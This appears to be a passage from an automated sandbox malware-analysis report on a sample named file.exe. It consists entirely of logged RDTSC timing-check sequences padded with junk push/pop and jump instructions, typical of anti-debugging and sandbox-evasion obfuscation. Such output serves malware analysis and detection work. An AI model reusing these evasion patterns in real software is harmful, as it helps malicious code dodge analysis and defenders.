Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6CF10A second address: 6CF10E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6CF10E second address: 6CF135 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c popad 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F8C5451FBC4h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6CF135 second address: 6CF16E instructions: 0x00000000 rdtsc 0x00000002 js 00007F8C54522434h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d jmp 00007F8C54522435h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 push ecx 0x00000018 push ecx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6CF237 second address: 6CF23B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6CF23B second address: 6CF245 instructions: 0x00000000 rdtsc 0x00000002 je 00007F8C54522426h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6CF245 second address: 6CF25A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jo 00007F8C5451FBB8h 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EFFFB second address: 6EFFFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EFFFF second address: 6F002D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jmp 00007F8C5451FBC9h 0x0000000e pop ecx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jns 00007F8C5451FBB6h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C18E5 second address: 6C18E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EDF63 second address: 6EDF87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F8C5451FBC9h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EDF87 second address: 6EDF8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EDF8B second address: 6EDF91 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EDF91 second address: 6EDF9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EDF9B second address: 6EDFA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EDFA1 second address: 6EDFE1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C54522432h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnl 00007F8C54522432h 0x00000011 popad 0x00000012 pushad 0x00000013 jmp 00007F8C5452242Fh 0x00000018 push edi 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EE110 second address: 6EE15C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C5451FBC1h 0x00000009 jmp 00007F8C5451FBBEh 0x0000000e popad 0x0000000f pushad 0x00000010 push ebx 0x00000011 pushad 0x00000012 popad 0x00000013 pop ebx 0x00000014 jmp 00007F8C5451FBC9h 0x00000019 push eax 0x0000001a push edx 0x0000001b jl 00007F8C5451FBB6h 0x00000021 push esi 0x00000022 pop esi 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EE15C second address: 6EE160 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EE3EF second address: 6EE3F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EE551 second address: 6EE555 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EEF07 second address: 6EEF0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6B0B4C second address: 6B0B5E instructions: 0x00000000 rdtsc 0x00000002 js 00007F8C54522426h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EF1FB second address: 6EF20B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 je 00007F8C5451FBB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EF20B second address: 6EF20F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F43C8 second address: 6F43CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F462D second address: 6F4631 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F4631 second address: 6F464C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C5451FBC4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F47E4 second address: 6F47E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6AD5A4 second address: 6AD5C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F8C5451FBB6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F8C5451FBBAh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6AD5C0 second address: 6AD5C6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FB376 second address: 6FB3A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C5451FBBBh 0x00000009 push eax 0x0000000a pop eax 0x0000000b jmp 00007F8C5451FBC9h 0x00000010 popad 0x00000011 pushad 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FA7CF second address: 6FA7F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C5452242Ah 0x00000007 pushad 0x00000008 jmp 00007F8C54522438h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FAF0E second address: 6FAF14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FAF14 second address: 6FAF25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 js 00007F8C5452242Ch 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FAF25 second address: 6FAF70 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F8C5451FBC0h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b jmp 00007F8C5451FBC1h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 je 00007F8C5451FBB6h 0x0000001b push edi 0x0000001c pop edi 0x0000001d pushad 0x0000001e popad 0x0000001f jmp 00007F8C5451FBC4h 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FCF06 second address: 6FCF0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FCFF1 second address: 6FD00F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 ja 00007F8C5451FBBAh 0x0000000d push esi 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pop esi 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 jl 00007F8C5451FBB6h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FD150 second address: 6FD154 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FD2B9 second address: 6FD2BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FD2BF second address: 6FD2C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FD407 second address: 6FD40E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FD714 second address: 6FD72E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8C54522436h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FDB4D second address: 6FDB53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FDC0D second address: 6FDC11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FDCD3 second address: 6FDCD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FDE7C second address: 6FDE90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d jnp 00007F8C54522426h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7006C6 second address: 7006CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7006CA second address: 7006D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7012AE second address: 7012C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 jp 00007F8C5451FBB8h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7012C2 second address: 7012C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7036D0 second address: 7036EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8C5451FBC3h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7036EF second address: 7036F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 70B593 second address: 70B59D instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8C5451FBBCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 70C79C second address: 70C7A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 70E62F second address: 70E633 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 706C5B second address: 706C5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 712696 second address: 71269A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71269A second address: 7126A0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 70B79C second address: 70B7B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8C5451FBC6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 70E816 second address: 70E81B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 70F707 second address: 70F713 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 710797 second address: 71079B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 70F713 second address: 70F717 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71079B second address: 71079F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 70F717 second address: 70F71D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71079F second address: 7107A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71454A second address: 71454E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 70F71D second address: 70F727 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F8C54522426h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71454E second address: 714593 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8C5451FBB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e jng 00007F8C5451FBBAh 0x00000014 mov di, 3156h 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push edx 0x0000001d call 00007F8C5451FBB8h 0x00000022 pop edx 0x00000023 mov dword ptr [esp+04h], edx 0x00000027 add dword ptr [esp+04h], 00000018h 0x0000002f inc edx 0x00000030 push edx 0x00000031 ret 0x00000032 pop edx 0x00000033 ret 0x00000034 push 00000000h 0x00000036 mov bx, si 0x00000039 xchg eax, esi 0x0000003a push edi 0x0000003b push eax 0x0000003c push edx 0x0000003d push ebx 0x0000003e pop ebx 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7166CA second address: 7166DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007F8C54522428h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7146FD second address: 714722 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8C5451FBB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F8C5451FBC7h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7166DB second address: 7166E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F8C54522426h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 711860 second address: 711864 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 711864 second address: 711879 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jp 00007F8C54522428h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 711879 second address: 71187E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71187E second address: 711884 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7166E5 second address: 71673B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 add edi, 446C8F89h 0x0000000f jmp 00007F8C5451FBC1h 0x00000014 push 00000000h 0x00000016 mov bh, cl 0x00000018 push 00000000h 0x0000001a sub dword ptr [ebp+12460BE0h], ebx 0x00000020 xchg eax, esi 0x00000021 push ebx 0x00000022 jmp 00007F8C5451FBC4h 0x00000027 pop ebx 0x00000028 push eax 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F8C5451FBBFh 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 717691 second address: 71769E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71874D second address: 718752 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7242EA second address: 72431F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F8C54522436h 0x0000000a jmp 00007F8C54522436h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72431F second address: 72433C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C5451FBC9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 723A2B second address: 723A30 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 723A30 second address: 723A3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jl 00007F8C5451FBB6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 723BEF second address: 723C04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C5452242Ch 0x00000009 push eax 0x0000000a pop eax 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 723C04 second address: 723C25 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C5451FBBAh 0x00000007 pushad 0x00000008 jmp 00007F8C5451FBC2h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 723D69 second address: 723D74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 pop eax 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 723D74 second address: 723DA0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C5451FBBFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F8C5451FBC4h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72E935 second address: 72E93C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72D69B second address: 72D69F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72D69F second address: 72D6A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72D6A3 second address: 72D6B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F8C5451FBB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72D6B3 second address: 72D6B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72D6B9 second address: 72D6C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72DDA4 second address: 72DDA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72DDA9 second address: 72DDB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 jg 00007F8C5451FBBEh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72DF12 second address: 72DF17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72DF17 second address: 72DF45 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C5451FBC7h 0x00000007 pushad 0x00000008 ja 00007F8C5451FBB6h 0x0000000e jmp 00007F8C5451FBBCh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72DF45 second address: 72DF4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72E06E second address: 72E072 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72E072 second address: 72E095 instructions: 0x00000000 rdtsc 0x00000002 je 00007F8C54522426h 0x00000008 jmp 00007F8C54522436h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
